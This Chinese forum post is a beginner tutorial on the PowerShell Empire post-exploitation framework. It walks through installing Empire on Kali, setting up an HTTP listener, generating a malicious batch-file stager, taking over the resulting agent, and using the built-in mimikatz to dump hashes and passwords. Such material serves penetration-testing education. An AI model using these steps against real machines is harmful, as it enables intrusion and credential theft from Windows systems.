设为首页收藏本站
搜索
Kali笔记»社区 kali 基础 基础教程 Empire入门学习
返回列表 发新帖
查看: 5203|回复: 0

Empire入门学习

[复制链接]
admin

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2022-11-17 22:29:15 | 显示全部楼层 |阅读模式 来自 甘肃
[md]>Empire是针对Windows平台的,使用PowerShell脚本作为测试载荷的渗透测试测试框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。
![1491573871.jpg](data/attachment/forum/202211/17/222849jvm5541z8p8lov9v.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "1491573871.jpg")

![Empire][1]
### 在kali中安装
在kali中安装很简单,我们只需执行下面命令即可。
```
sudo apt install powershell-empire
```
![][2]
### 启动服务端
这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动`Empire powershell`服务端
```
powershell-empire server
```
![][3]
### 启动Empire powershell 客户端
```
powershell-empire client
```
![][4]
### 牛刀小试
`Empire`的使用方法与`msf`的方法相同,先设置监听,生成Shell,然后监听反弹代理。
输入`Listeners`进入监听页面,`uselistener`设置监听模式,共有7种模式

- dbx
- http
- http_foreign
- http_hop
- http_mapi
- http_com
- meterpreter

这里,我们以`http`模块为例:
```
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行
```
![][5]
现在配置完监听模块,我们来看看怎样生成shell.
!!!
<div class="ad">
        <img class="adimg" src="https://blog.bbskali.cn/ad/wx1.png">
       
</div>
!!!
使用`windows/launcher_bat`模块,来生成恶意shell。
```
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行
```
执行完成上面的命令后,我们的恶意文件已经生成。格式为`bat`
![][6]
![][7]
双击运行后,我们可以看到已经成功得到了会话。输入`agents`可以查看连接上的计算机的详细信息。
![][8]
### 连接设备
和msf一样,我们需要连接当前在线的设备。`interact 设备name`
```
interact V1T86EUN
```
![][9]
运行help命令,可以看到具体的帮助文档。
![][10]
由于命令比较多,这里我列举常用的一些命令
**进入系统cmd**
```
shell
```
![][11]

**使用内置的mimikatz抓取hash和密码**
```
mimikatz
```
**设备详细信息**
```
info
```
![12.png][12]
### 总结
empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!


  [1]: https://blog.bbskali.cn/usr/uploads/2022/11/3392759065.jpg
  [2]: https://blog.bbskali.cn/usr/uploads/2022/11/1726391229.png
  [3]: https://blog.bbskali.cn/usr/uploads/2022/11/782013525.png
  [4]: https://blog.bbskali.cn/usr/uploads/2022/11/3227777116.png
  [5]: https://blog.bbskali.cn/usr/uploads/2022/11/2825878783.png
  [6]: https://blog.bbskali.cn/usr/uploads/2022/11/4041052440.png
  [7]: https://blog.bbskali.cn/usr/uploads/2022/11/3773782073.png
  [8]: https://blog.bbskali.cn/usr/uploads/2022/11/3629749924.png
  [9]: https://blog.bbskali.cn/usr/uploads/2022/11/1766095549.png
  [10]: https://blog.bbskali.cn/usr/uploads/2022/11/3753414467.png
  [11]: https://blog.bbskali.cn/usr/uploads/2022/11/1635092308.png
  [12]: https://blog.bbskali.cn/usr/uploads/2022/11/2471485958.png
[/md]
1491573871.jpg
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表